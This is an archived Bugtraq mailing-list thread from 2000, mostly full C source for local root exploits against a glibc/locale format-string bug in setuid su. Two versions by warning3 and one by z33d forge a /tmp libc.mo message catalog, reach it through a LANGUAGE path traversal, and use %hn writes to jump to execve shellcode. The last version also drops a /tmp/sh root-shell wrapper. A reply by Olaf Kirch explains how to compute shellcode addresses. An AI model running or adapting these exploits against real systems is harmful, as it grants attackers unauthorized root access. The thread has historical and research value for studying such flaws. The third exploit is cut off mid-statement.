5442114 2000-09-07  05:10  /146 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12636>
Ärende: glibc/locale exploit for linux/x86
------------------------------------------------------------
From: Warning3 <warning3@MAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200009061306.VAA02539@intra.nsfocus.com>

Hi,

I wrote an exploit for testing the glibc/locale format string
vulnerability. It was tested on Red Hat 6.2 with kernel 2.2.16.

regards,
warning3 <mailto:warning3@nsfocus.com>


/* exploit for glibc/locale format strings bug.
 * Tested in RedHat 6.2 with kernel 2.2.16.
 * Script kiddies: you should modify this code
 * slightly by yourself. :)
 *
 * Greets: Solar Designer, Jouko Pynnönen, zenith parsec
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
 * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
 *
 *           by warning3@nsfocus.com (http://www.nsfocus.com)
 *                                     y2k/9/6
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define DEFAULT_OFFSET                  550   /* added to our own esp to guess where the EGG= string lands on su's stack (shell_addr) */
#define DEFAULT_ALIGNMENT                 2   /* number of 'A' padding bytes appended to buff after the two addresses */
#define DEFAULT_RETLOC           0xbfffd2ff   /* address the two %hn writes go to (low half here, high half at +2); presumably a saved return address in su -- must be found per target */
#define DEFAULT_BUFFER_SIZE            2048   /* size of buff1, the format-string payload that becomes the msgstr */
#define DEFAULT_EGG_SIZE               1024   /* size of the EGG= environment string (NOP sled + shellcode) and of buff */
#define NOP                            0x90   /* x86 one-byte nop used for the sled */
#define PATH             "/tmp/LC_MESSAGES"   /* where the forged libc.mo is written; reached via LANGUAGE=sk_SK/../../../../../../tmp */

/* Payload placed in the EGG= environment string: the classic x86 Linux
 * execve("/bin/sh") shellcode -- jmp/call/pop to locate the trailing
 * "/bin/sh", int 0x80 with al=0x0b (execve), then exit via int 0x80.
 * 45 bytes and free of 0x00, so it survives being handled as a C string. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";


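/* Return (approximately) the caller's stack pointer.  main() uses it as
 * the base for guessing where the EGG= string will sit on su's stack:
 * shell_addr = get_esp() + offset.
 *
 * The original body was a bare "movl %esp,%eax" with no return statement,
 * relying on eax still holding the value at function exit.  That is
 * undefined behaviour (missing return in a non-void function) and an
 * optimising compiler may emit anything.  Read the register through an
 * output operand and return it explicitly.  The exploit itself targets
 * i386; the other arms only keep the file building on other hosts. */
unsigned long get_esp(void) {
   unsigned long sp;
#if defined(__i386__)
   __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
#elif defined(__x86_64__)
   __asm__ volatile ("movq %%rsp, %0" : "=r" (sp));
#else
   /* not x86: the address of a local is the closest portable stand-in */
   sp = (unsigned long) (void *) &sp;
#endif
   return sp;
}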


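 /*
  * Build the two attacker-controlled inputs and exec the target.
  *
  * argv[1..6] override, in order: RETloc (hex), offset, num, align,
  * buffsize, eggsize; the defaults are the DEFAULT_* macros.
  *
  * What is built:
  *   buff  -- su's command-line argument: two 4-byte 'A' fillers, each
  *            followed by a little-endian address (retloc, retloc+2),
  *            then `align` bytes of 'A'.  The %hn conversions in buff1
  *            write through those two addresses.
  *   buff1 -- the malicious translation: `num` copies of "%.8x" (each pops
  *            one stack word and prints exactly 8 bytes), then
  *            "%<pad>c%hn" twice to write the low and high 16 bits of
  *            shell_addr.  Each %c eats an "AAAA" filler, each %hn the
  *            address behind it, so num must be tuned per target.
  *   egg   -- "EGG=" + NOP sled + shellcode, handed over in the
  *            environment; shell_addr = esp + offset is a guess at where
  *            it lands on su's stack and only has to hit the sled.
  *
  * buff1 is written to PATH/libc.po as the translation of glibc's getopt
  * message "%s: invalid option -- %c\n" and compiled with msgfmt.
  * LANGUAGE=sk_SK/../../../../../../tmp makes su's libc load that catalog,
  * and "su -u" is an invalid option, so the translated string is used as
  * the format string.
  *
  * Fixes over the original: explicit int return type, usage string on one
  * line (the mail wrap had split the literal), all sizes validated before
  * any write, buff NUL-terminated (it is an argv string), fopen/chdir/
  * fclose/msgfmt/execle results checked, exit status 1 on failure.
  *
  * Returns 1 on any setup error or if execle() fails; does not return on
  * success.
  */
 int main(int argc, char *argv[]) {
   enum { ADDR_WORDS = 2, FILLER = 4, TRAILER_MAX = 40 };
   char *buff, *buff1, *ptr, *egg;
   char *env[3];
   unsigned long shell_addr, retloc = DEFAULT_RETLOC;
   int offset = DEFAULT_OFFSET, align = DEFAULT_ALIGNMENT;
   int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
   int i, reth, retl, num = 113;
   size_t shlen = strlen(shellcode), fmtlen;
   FILE *fp;

   /* Optional overrides, in the order the usage line prints them.
    * strtoul(.., 16) accepts the same "0x..."/bare-hex forms sscanf %x did. */
   if (argc > 1) retloc  = strtoul(argv[1], NULL, 16);
   if (argc > 2) offset  = atoi(argv[2]);
   if (argc > 3) num     = atoi(argv[3]);
   if (argc > 4) align   = atoi(argv[4]);
   if (argc > 5) bsize   = atoi(argv[5]);
   if (argc > 6) eggsize = atoi(argv[6]);

   printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n", argv[0]);

   /* Bound every later write.  The original trusted these blindly; a small
    * buffsize/eggsize or a negative value overflowed our own heap. */
   if (num < 0 || bsize < 0 || (size_t)num * 4 + TRAILER_MAX > (size_t)bsize) {
     fprintf(stderr, "num=%d does not fit in buffsize=%d\n", num, bsize);
     return 1;
   }
   if (align < 0 || eggsize < 0 ||
       (size_t)align + ADDR_WORDS * (FILLER + 4) + 1 > (size_t)eggsize) {
     fprintf(stderr, "align=%d does not fit in eggsize=%d\n", align, eggsize);
     return 1;
   }
   if ((size_t)eggsize < shlen + 4 + 1) {
     fprintf(stderr, "eggsize=%d is too small for \"EGG=\" + shellcode\n", eggsize);
     return 1;
   }

   if (!(buff = malloc((size_t)eggsize)) || !(buff1 = malloc((size_t)bsize)) ||
       !(egg = malloc((size_t)eggsize))) {
     printf("Can't allocate memory.\n");
     return 1;
   }

   printf("Using RET location address: 0x%lx\n", retloc);
   shell_addr = get_esp() + offset;
   printf("Using Shellcode address: 0x%lx\n", shell_addr);

   reth = (int)((shell_addr >> 16) & 0xffff);
   retl = (int)(shell_addr & 0xffff);

   /* The first %c pad is retl - num*8; a negative value would be printed
    * as a ~4 GB field width, so refuse the combination up front. */
   if (retl < num * 8) {
     fprintf(stderr, "low half 0x%x of shell_addr is below num*8=%d; lower num or offset\n",
             retl, num * 8);
     return 1;
   }

   /* buff: "AAAA" retloc "AAAA" retloc+2, 'A' x align, NUL.
    * The address bytes must not contain 0x00 or argv is cut short
    * (0xbfffd2ff is fine). */
   ptr = buff;
   for (i = 0; i < ADDR_WORDS; i++, retloc += 2) {
     memset(ptr, 'A', FILLER);
     ptr += FILLER;
     *ptr++ = (char)(retloc & 0xff);
     *ptr++ = (char)((retloc >> 8) & 0xff);
     *ptr++ = (char)((retloc >> 16) & 0xff);
     *ptr++ = (char)((retloc >> 24) & 0xff);
   }
   memset(ptr, 'A', (size_t)align);
   ptr[align] = '\0';                  /* the original left buff unterminated */

   /* buff1: num x "%.8x", then
    *   "%<retl-num*8>c%hn"        count reaches the low 16 bits -> retloc
    *   "%<0x10000+reth-retl>c%hn" count (mod 0x10000) reaches the high
    *                              16 bits -> retloc+2 */
   ptr = buff1;
   for (i = 0; i < num; i++) {
     memcpy(ptr, "%.8x", 4);
     ptr += 4;
   }
   fmtlen = (size_t)num * 4;
   snprintf(ptr, (size_t)bsize - fmtlen, "%%%uc%%hn%%%uc%%hn",
            (unsigned)(retl - num * 8), (unsigned)(0x10000 + reth - retl));

   /* Plant the catalog.
    * NOTE(review): fixed, predictable path under world-writable /tmp --
    * another local user can pre-create or symlink it.  Fine for a PoC on
    * your own box, not on a shared one. */
   (void)mkdir(PATH, 0755);            /* may already exist from a previous run */
   if (chdir(PATH) < 0) {
     perror("chdir " PATH);
     return 1;
   }
   if (!(fp = fopen("libc.po", "w+"))) {
     perror("fopen libc.po");
     return 1;
   }
   fprintf(fp, "msgid \"%%s: invalid option -- %%c\\n\"\n");
   fprintf(fp, "msgstr \"%s\\n\"", buff1);
   if (fclose(fp) != 0) {
     perror("fclose libc.po");
     return 1;
   }
   if (system("/usr/bin/msgfmt libc.po -o libc.mo") != 0) {
     fprintf(stderr, "msgfmt failed; libc.mo was not (re)built\n");
     return 1;
   }

   /* egg: "EGG=" + NOP sled + shellcode + NUL, passed in the environment. */
   memset(egg, NOP, (size_t)eggsize - shlen - 1);
   memcpy(egg + (size_t)eggsize - shlen - 1, shellcode, shlen);
   egg[eggsize - 1] = '\0';
   memcpy(egg, "EGG=", 4);

   env[0] = egg;
   env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
   env[2] = NULL;

   execle("/bin/su", "su", "-u", buff, (char *)NULL, env);
   perror("execle /bin/su");           /* only reached if the exec failed */
   return 1;
 }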

5444833 2000-09-07  18:51  /42 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12646>
Kommentar till text 5442114 av Brevbäraren (som är implementerad i) Python
Ärende: Re: glibc/locale exploit for linux/x86
------------------------------------------------------------
From: Olaf Kirch <okir@CALDERA.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000907104337.T2636@monad.swb.de>

On Wed, Sep 06, 2000 at 09:01:47PM +0800, Warning3 wrote:
>     printf("Using RET location address: 0x%x\n", retloc);
>     shell_addr = get_esp() + offset;

I've always wondered why all these exploits mess around with
strange offsets... When the ix86 Linux kernel execs an ELF program,
the stack looks like this (at least it did every time I checked)

0x80000000
0x7FFFFFFC 00 00 00 00
           argv[0] + NUL byte
	   last envar
	   ...
	   first envar
	   argv

So it's easy to compute the start of your shell code without
having to rely on magic offsets -- provided the stack top is right for
the target: the 0xbfff.... addresses in the exploit above imply a stack
top of 0xC0000000 on that Red Hat 6.2 kernel, so the constant below has
to be adjusted per kernel:

	shell_addr = (caddr_t) 0x7FFFFFFC
			- strlen(ARGV0) - 1
			- strlen(EGG) - 1;
	...
	n = 0;
	myenv[n++] = ...
	myenv[n++] = EGG;
	myenv[n++] = NULL;
	execle(VICTIM_PROGRAM, ARGV0, ..., NULL, myenv);

Just wondering...
Olaf
--
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de    +-------------------- Why Not?! -----------------------
         UNIX, n.: Spanish manufacturer of fire extinguishers.

5444806 2000-09-07  18:40  /132 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12643>
Kommentar till text 5444805 av Brevbäraren (som är implementerad i) Python
Ärende: Bilaga (locale.c) till: Re: glibc/locale exploit for linux/x86
------------------------------------------------------------
/* exploit for glibc/locale format strings bug.
 * Tested in RedHat 6.2 with kernel 2.2.16.
 * Script kiddies: you should modify this code
 * slightly by yourself. :)
 *
 * Greets: Solar Designer, Jouko Pynnönen, zenith parsec
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
 * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
 *
 *           by warning3@nsfocus.com (http://www.nsfocus.com)
 *                                     y2k/9/6
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define DEFAULT_OFFSET                  550   /* added to our own esp to guess where the EGG= string lands on su's stack (shell_addr) */
#define DEFAULT_ALIGNMENT                 2   /* number of 'A' padding bytes appended to buff after the two addresses */
#define DEFAULT_RETLOC           0xbfffd250   /* address the two %hn writes go to (low half here, high half at +2); presumably a saved return address in su -- must be found per target */
#define DEFAULT_BUFFER_SIZE            2048   /* size of buff1, the format-string payload that becomes the msgstr */
#define DEFAULT_EGG_SIZE               1024   /* size of the EGG= environment string (NOP sled + shellcode) and of buff */
#define NOP                            0x90   /* x86 one-byte nop used for the sled */
#define PATH             "/tmp/LC_MESSAGES"   /* where the forged libc.mo is written; reached via LANGUAGE=sk_SK/../../../../../../tmp */

/* Payload placed in the EGG= environment string: the classic x86 Linux
 * execve("/bin/sh") shellcode -- jmp/call/pop to locate the trailing
 * "/bin/sh", int 0x80 with al=0x0b (execve), then exit via int 0x80.
 * 45 bytes and free of 0x00, so it survives being handled as a C string. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";


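/* Return (approximately) the caller's stack pointer.  main() uses it as
 * the base for guessing where the EGG= string will sit on su's stack:
 * shell_addr = get_esp() + offset.
 *
 * The original body was a bare "movl %esp,%eax" with no return statement,
 * relying on eax still holding the value at function exit.  That is
 * undefined behaviour (missing return in a non-void function) and an
 * optimising compiler may emit anything.  Read the register through an
 * output operand and return it explicitly.  The exploit itself targets
 * i386; the other arms only keep the file building on other hosts. */
unsigned long get_esp(void) {
   unsigned long sp;
#if defined(__i386__)
   __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
#elif defined(__x86_64__)
   __asm__ volatile ("movq %%rsp, %0" : "=r" (sp));
#else
   /* not x86: the address of a local is the closest portable stand-in */
   sp = (unsigned long) (void *) &sp;
#endif
   return sp;
}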


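 /*
  * Build the two attacker-controlled inputs and exec the target.
  * Revised version of the first posting: RETLOC 0xbfffd250, num=111, and
  * a format trailer that starts with one unpadded "%x".
  *
  * argv[1..6] override, in order: RETloc (hex), offset, num, align,
  * buffsize, eggsize; the defaults are the DEFAULT_* macros.
  *
  * What is built:
  *   buff  -- su's command-line argument: two 4-byte 'A' fillers, each
  *            followed by a little-endian address (retloc, retloc+2),
  *            then `align` bytes of 'A'.  The %hn conversions in buff1
  *            write through those two addresses.
  *   buff1 -- the malicious translation: `num` copies of "%.8x" (each pops
  *            one stack word and prints exactly 8 bytes), one "%x", then
  *            "%<pad>c%hn" twice to write the low and high 16 bits of
  *            shell_addr.  Each %c eats an "AAAA" filler, each %hn the
  *            address behind it, so num must be tuned per target.
  *   egg   -- "EGG=" + NOP sled + shellcode, handed over in the
  *            environment; shell_addr = esp + offset is a guess at where
  *            it lands on su's stack and only has to hit the sled.
  *
  * buff1 is written to PATH/libc.po as the translation of glibc's getopt
  * message "%s: invalid option -- %c\n" and compiled with msgfmt.
  * LANGUAGE=sk_SK/../../../../../../tmp makes su's libc load that catalog,
  * and "su -u" is an invalid option, so the translated string is used as
  * the format string.
  *
  * Fixes over the original: explicit int return type, usage string on one
  * line (the mail wrap had split the literal), all sizes validated before
  * any write, buff NUL-terminated (it is an argv string), fopen/chdir/
  * fclose/msgfmt/execle results checked, exit status 1 on failure.
  *
  * Returns 1 on any setup error or if execle() fails; does not return on
  * success.
  */
 int main(int argc, char *argv[]) {
   enum { ADDR_WORDS = 2, FILLER = 4, TRAILER_MAX = 40 };
   char *buff, *buff1, *ptr, *egg;
   char *env[3];
   unsigned long shell_addr, retloc = DEFAULT_RETLOC;
   int offset = DEFAULT_OFFSET, align = DEFAULT_ALIGNMENT;
   int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
   int i, reth, retl, num = 111;
   size_t shlen = strlen(shellcode), fmtlen;
   FILE *fp;

   /* Optional overrides, in the order the usage line prints them.
    * strtoul(.., 16) accepts the same "0x..."/bare-hex forms sscanf %x did. */
   if (argc > 1) retloc  = strtoul(argv[1], NULL, 16);
   if (argc > 2) offset  = atoi(argv[2]);
   if (argc > 3) num     = atoi(argv[3]);
   if (argc > 4) align   = atoi(argv[4]);
   if (argc > 5) bsize   = atoi(argv[5]);
   if (argc > 6) eggsize = atoi(argv[6]);

   printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n", argv[0]);

   /* Bound every later write.  The original trusted these blindly; a small
    * buffsize/eggsize or a negative value overflowed our own heap. */
   if (num < 0 || bsize < 0 || (size_t)num * 4 + TRAILER_MAX > (size_t)bsize) {
     fprintf(stderr, "num=%d does not fit in buffsize=%d\n", num, bsize);
     return 1;
   }
   if (align < 0 || eggsize < 0 ||
       (size_t)align + ADDR_WORDS * (FILLER + 4) + 1 > (size_t)eggsize) {
     fprintf(stderr, "align=%d does not fit in eggsize=%d\n", align, eggsize);
     return 1;
   }
   if ((size_t)eggsize < shlen + 4 + 1) {
     fprintf(stderr, "eggsize=%d is too small for \"EGG=\" + shellcode\n", eggsize);
     return 1;
   }

   if (!(buff = malloc((size_t)eggsize)) || !(buff1 = malloc((size_t)bsize)) ||
       !(egg = malloc((size_t)eggsize))) {
     printf("Can't allocate memory.\n");
     return 1;
   }

   printf("Using RET location address: 0x%lx\n", retloc);
   shell_addr = get_esp() + offset;
   printf("Using Shellcode address: 0x%lx\n", shell_addr);

   reth = (int)((shell_addr >> 16) & 0xffff);
   retl = (int)(shell_addr & 0xffff);

   /* The first %c pad is retl - num*8; a negative value would be printed
    * as a ~4 GB field width, so refuse the combination up front. */
   if (retl < num * 8) {
     fprintf(stderr, "low half 0x%x of shell_addr is below num*8=%d; lower num or offset\n",
             retl, num * 8);
     return 1;
   }

   /* buff: "AAAA" retloc "AAAA" retloc+2, 'A' x align, NUL.
    * The address bytes must not contain 0x00 or argv is cut short
    * (0xbfffd250 is fine). */
   ptr = buff;
   for (i = 0; i < ADDR_WORDS; i++, retloc += 2) {
     memset(ptr, 'A', FILLER);
     ptr += FILLER;
     *ptr++ = (char)(retloc & 0xff);
     *ptr++ = (char)((retloc >> 8) & 0xff);
     *ptr++ = (char)((retloc >> 16) & 0xff);
     *ptr++ = (char)((retloc >> 24) & 0xff);
   }
   memset(ptr, 'A', (size_t)align);
   ptr[align] = '\0';                  /* the original left buff unterminated */

   /* buff1: num x "%.8x", then
    *   "%x"                          pops one more word, unpadded
    *   "%<retl-num*8>c%hn"           count reaches the low 16 bits -> retloc
    *   "%<0x10000+reth-retl-6>c%hn"  count (mod 0x10000) reaches the high
    *                                 16 bits -> retloc+2
    * NOTE(review): the digits printed by that "%x" are not subtracted from
    * the first pad but 6 are subtracted from the second, so if the popped
    * word prints as 6 hex digits the high half is exact and the low half
    * is written as retl+6 -- still inside the NOP sled, which is presumably
    * why it was left uncompensated.  Confirm with gdb before changing num
    * or the pads. */
   ptr = buff1;
   for (i = 0; i < num; i++) {
     memcpy(ptr, "%.8x", 4);
     ptr += 4;
   }
   fmtlen = (size_t)num * 4;
   snprintf(ptr, (size_t)bsize - fmtlen, "%%x%%%uc%%hn%%%uc%%hn",
            (unsigned)(retl - num * 8), (unsigned)(0x10000 + reth - retl - 6));

   /* Plant the catalog.
    * NOTE(review): fixed, predictable path under world-writable /tmp --
    * another local user can pre-create or symlink it.  Fine for a PoC on
    * your own box, not on a shared one. */
   (void)mkdir(PATH, 0755);            /* may already exist from a previous run */
   if (chdir(PATH) < 0) {
     perror("chdir " PATH);
     return 1;
   }
   if (!(fp = fopen("libc.po", "w+"))) {
     perror("fopen libc.po");
     return 1;
   }
   fprintf(fp, "msgid \"%%s: invalid option -- %%c\\n\"\n");
   fprintf(fp, "msgstr \"%s\\n\"", buff1);
   if (fclose(fp) != 0) {
     perror("fclose libc.po");
     return 1;
   }
   if (system("/usr/bin/msgfmt libc.po -o libc.mo") != 0) {
     fprintf(stderr, "msgfmt failed; libc.mo was not (re)built\n");
     return 1;
   }

   /* egg: "EGG=" + NOP sled + shellcode + NUL, passed in the environment. */
   memset(egg, NOP, (size_t)eggsize - shlen - 1);
   memcpy(egg + (size_t)eggsize - shlen - 1, shellcode, shlen);
   egg[eggsize - 1] = '\0';
   memcpy(egg, "EGG=", 4);

   env[0] = egg;
   env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
   env[2] = NULL;

   execle("/bin/su", "su", "-u", buff, (char *)NULL, env);
   perror("execle /bin/su");           /* only reached if the exec failed */
   return 1;
 }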

5446062 2000-09-08  02:53  /174 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12668>
Ärende: glibc language
------------------------------------------------------------
From: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.3.96.1000907235942.5333A-100000@sv>

/*
 * "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
 *						- greg@tenet.pl -
 *
 * GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
 * with bypassing Solar Designer Stack Patch
 *
 * Dedicated to greg@tenet.pl
 *
 * It doesn't work. ;> Try use gdb to find special value.
 * Tested on Debian 2.1/2.2 ziemniak
 * Greetz:
 *  - abusers from if.pwr.wroc.pl :))) (IF-NET)
 *  - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
 *  - lcamtuf - argante rulz :)
 *  - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
 *    :))))))))))))))))))))))
 *  - secure@poz.sm.pl no i wogole #sigsegv
 *    funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
 *  - breslau killers z vx na czele :>
 *  - ppl from my so called real life
 *  - kefir truskawkowy
 * most code I ripped :>
 */

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define DEFAULT_ALIGNMENT                 2        /* number of 'A' padding bytes appended to buff after the two addresses */
// #define DEFAULT_RETLOC           0xbfffd2ff
// #define DEFAULT_RETLOC	    0xbffff798
#define DEFAULT_RETLOC	0xbffff770   /* address the two %hn writes go to (low half here, high half at +2); two earlier candidates kept above -- must be found per target */
#define DEFAULT_BUFFER_SIZE            2048        /* size of buff1, the format-string payload that becomes the msgstr */
#define PATH             "/tmp/LC_MESSAGES"        /* where the forged libc.mo is written; reached via LANGUAGE=sk_SK/../../../../../../tmp */

/* Payload appended to the msgstr, so it lives inside libc.mo rather than
 * on the stack (the "bypassing Solar Designer Stack Patch" part):
 *   32 x 0x90           nop sled
 *   "dupaa"             5-byte marker, presumably to spot the payload in gdb
 *   31 c0 b0 46 31 db   eax=0x46 (setreuid on i386), ebx=-1, ecx=0,
 *   89 d9 4b cd 80      int 0x80  -> setreuid(-1, 0)
 *   eb 1f 5e 90 ...     the classic jmp/call/pop execve stub, except that
 *                       the 11 bytes which in the stock version store the
 *                       NUL and the argv/envp pointers are nops here;
 *                       then execve("/tmp/sh", ...) via int 0x80 and exit.
 * NOTE(review): with those stores gone the bytes following "/tmp/sh" in
 * the catalog presumably have to be zero already -- see the six zero bytes
 * main() writes at the end of libc.mo.  Confirm with a hex dump. */
char shellcode[]=
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"dupaa"
        "\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
        "\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
// very special shellcode, 15 min ;> big thanks to yeti

/* Source of /tmp/sh, which main() writes out and compiles and which the
 * shellcode execs: a wrapper that sets the real and effective uid/gid to 0
 * (this only succeeds if the caller's effective uid is already 0, which
 * the setreuid(-1, 0) in the shellcode is there to arrange) and then
 * starts an interactive bash. */
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";

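/*
 * Build the inputs, plant the catalog with the shellcode inside it, drop
 * /tmp/sh, and exec the target.
 *
 * argv[1] overrides RETloc (hex), argv[2] overrides num.
 *
 * What is built:
 *   buff  -- su's command-line argument: two 4-byte 'A' fillers, each
 *            followed by a little-endian address (retloc, retloc+2),
 *            then `align` bytes of 'A'.  The %hn conversions in buff1
 *            write through those two addresses.
 *   buff1 -- the malicious translation: `num` copies of "%.8x" (each pops
 *            one stack word and prints exactly 8 bytes) followed by
 *            "%<pad>c%hn" twice to write the low and high 16 bits of
 *            shell_addr.  Each %c eats an "AAAA" filler, each %hn the
 *            address behind it.  shellcode[] is appended to this msgstr,
 *            so the payload ends up inside libc.mo.
 *
 * The header says this version does not work as posted and that the
 * "special value" (shell_addr) has to be found with gdb.
 *
 * Fixes over the original: all sizes validated before any write, buff
 * NUL-terminated (it is an argv string), open/fstat/lseek/write/fclose/
 * system/chdir results checked, exit status 1 on failure.
 *
 * Returns 1 on any setup error or if execle() fails; does not return on
 * success.
 */
int main(int argc, char *argv[]) {
  enum { BUFF_SIZE = 1024, ADDR_WORDS = 2, FILLER = 4, TRAILER_MAX = 40 };
  char *buff, *buff1, *ptr;
  char *env[2];
  unsigned long shell_addr, retloc = DEFAULT_RETLOC;
  int align = DEFAULT_ALIGNMENT;
  int bsize = DEFAULT_BUFFER_SIZE;
  int i, reth, retl, num = 132; /* maybe 121 */
  int fd;
  struct stat st;
  FILE *fp;

  /* strtoul(.., 16) accepts the same "0x..."/bare-hex forms sscanf %x did. */
  if (argc > 1) retloc = strtoul(argv[1], NULL, 16);
  if (argc > 2) num = atoi(argv[2]);

  printf("Stay sharp ...\n");
  printf("Usages: %s <RETloc> <num> (118<num<140)\n", argv[0]);

  /* Bound every later write; the original trusted num blindly. */
  if (num < 0 || (size_t)num * 4 + TRAILER_MAX > (size_t)bsize) {
    fprintf(stderr, "num=%d does not fit in the %d-byte format buffer\n", num, bsize);
    return 1;
  }
  if (align < 0 || (size_t)align + ADDR_WORDS * (FILLER + 4) + 1 > BUFF_SIZE) {
    fprintf(stderr, "align=%d does not fit in buff\n", align);
    return 1;
  }

  if (!(buff = malloc(BUFF_SIZE)) || !(buff1 = malloc((size_t)bsize))) {
    printf("Can't allocate memory.\n");
    return 1;
  }

  printf("Using RET location address: 0x%lx\n", retloc);
  /* Not a stack address.  Presumably where the mapped libc.mo -- and so
   * the shellcode appended to the msgstr -- ends up under the non-exec
   * stack patch; the header says to find it with gdb (0x00124270, or
   * 0x00124250). */
  shell_addr = 0x00124270;
  printf("Using Shellcode address: 0x%lx\n", shell_addr);

  reth = (int)((shell_addr >> 16) & 0xffff);
  retl = (int)(shell_addr & 0xffff);

  /* The first %c pad is retl - num*8; a negative value would be printed
   * as a ~4 GB field width, so refuse the combination up front. */
  if (retl < num * 8) {
    fprintf(stderr, "low half 0x%x of shell_addr is below num*8=%d; lower num\n",
            retl, num * 8);
    return 1;
  }

  /* buff: "AAAA" retloc "AAAA" retloc+2, 'A' x align, NUL.
   * The address bytes must not contain 0x00 or argv is cut short. */
  ptr = buff;
  for (i = 0; i < ADDR_WORDS; i++, retloc += 2) {
    memset(ptr, 'A', FILLER);
    ptr += FILLER;
    *ptr++ = (char)(retloc & 0xff);
    *ptr++ = (char)((retloc >> 8) & 0xff);
    *ptr++ = (char)((retloc >> 16) & 0xff);
    *ptr++ = (char)((retloc >> 24) & 0xff);
  }
  memset(ptr, 'A', (size_t)align);
  ptr[align] = '\0';                  /* the original left buff unterminated */

  /* buff1: num x "%.8x", then
   *   "%<retl-num*8>c%hn"        count reaches the low 16 bits -> retloc
   *   "%<0x10000+reth-retl>c%hn" count (mod 0x10000) reaches the high
   *                              16 bits -> retloc+2 */
  ptr = buff1;
  for (i = 0; i < num; i++) {
    memcpy(ptr, "%.8x", 4);
    ptr += 4;
  }
  snprintf(ptr, (size_t)bsize - (size_t)num * 4, "%%%uc%%hn%%%uc%%hn",
           (unsigned)(retl - num * 8), (unsigned)(0x10000 + reth - retl));

  /* Plant the catalog with the raw shellcode appended to the msgstr.
   * LANGUAGE=sk_SK/../../../../../../tmp makes su's libc load
   * /tmp/LC_MESSAGES/libc.mo, and "su -u" is an invalid option, so getopt
   * formats its error through our translation.
   * NOTE(review): fixed, predictable paths under world-writable /tmp --
   * another local user can pre-create or symlink them. */
  (void)mkdir(PATH, 0755);            /* may already exist from a previous run */
  if (chdir(PATH) < 0) {
    perror("chdir " PATH);
    return 1;
  }
  if (!(fp = fopen("libc.po", "w+"))) {
    printf("Skript kidies ?\n");
    perror("fopen libc.po");
    return 1;
  }
  fprintf(fp, "msgid \"%%s: invalid option -- %%c\\n\"\n");
  fprintf(fp, "msgstr \"%s%s\\n\"", buff1, shellcode);
  if (fclose(fp) != 0) {
    perror("fclose libc.po");
    return 1;
  }
  if (system("/usr/bin/msgfmt libc.po -o libc.mo") != 0) {
    fprintf(stderr, "msgfmt failed; libc.mo was not (re)built\n");
    return 1;
  }

  /* Overwrite the last two bytes of libc.mo, plus four past EOF, with
   * zeros.  NOTE(review): the execve stub in shellcode[] no longer stores
   * its own NUL/argv/envp (those bytes are nops), so this presumably
   * supplies the zeros after "/tmp/sh" that stand in for an empty argv
   * and envp -- confirm against a hex dump before changing it. */
  if ((fd = open("/tmp/LC_MESSAGES/libc.mo", O_RDWR)) < 0) {
    perror("open libc.mo");
    return 1;
  }
  if (fstat(fd, &st) < 0 || st.st_size < 2 ||
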